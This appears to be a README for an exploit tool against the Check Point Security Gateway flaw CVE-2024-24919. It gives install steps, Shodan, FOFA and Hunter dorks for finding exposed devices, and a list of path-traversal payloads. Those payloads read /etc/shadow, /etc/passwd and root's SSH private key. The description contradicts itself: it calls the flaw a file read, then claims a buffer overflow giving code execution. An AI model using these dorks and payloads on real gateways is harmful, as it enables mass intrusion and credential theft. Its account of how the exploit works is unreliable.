## https://sploitus.com/exploit?id=BCE6ADFB-753F-5A1D-9389-658E4FE2D47E
## **Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)**
### **Overview**
This repository contains a tool for exploiting the **CVE-2024-24919** vulnerability in Check Point Security Gateways. The tool is a multi-scanner that can identify vulnerable devices and a single-target exploit that can take full control of the affected device.
**CVE-2024-24919** is a high-severity information disclosure vulnerability that allows an attacker to remotely read arbitrary files on a Check Point Security Gateway. This vulnerability can be exploited to steal sensitive information, such as passwords and configuration files.
**Disclaimer:**
This tool is provided for educational purposes only. It should not be used to attack vulnerable systems without the explicit consent of the owner. The authors of this tool are not responsible for any damages that may result from its use.
### **How it works**
The exploit works by sending a specially crafted HTTP request to the vulnerable device. The request triggers a buffer overflow in the device's firmware, which allows the attacker to execute arbitrary code. The exploit can then be used to take full control of the device.
### **Requirements**
* Python 3
* colorama
* requests
### **Installation**
```
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
```
### **Usage**
You can scan singel target or multi!
```
python cve-2024-24919.py
```
### **Dorks **
```
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"
```
### ** Tool ScreenShot **
![ss](https://github.com/GoatSecurity/CVE-2024-24919/assets/153397256/c0f2dd29-a464-4a24-9356-f0db418c9235)
$ Tool paths :
```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```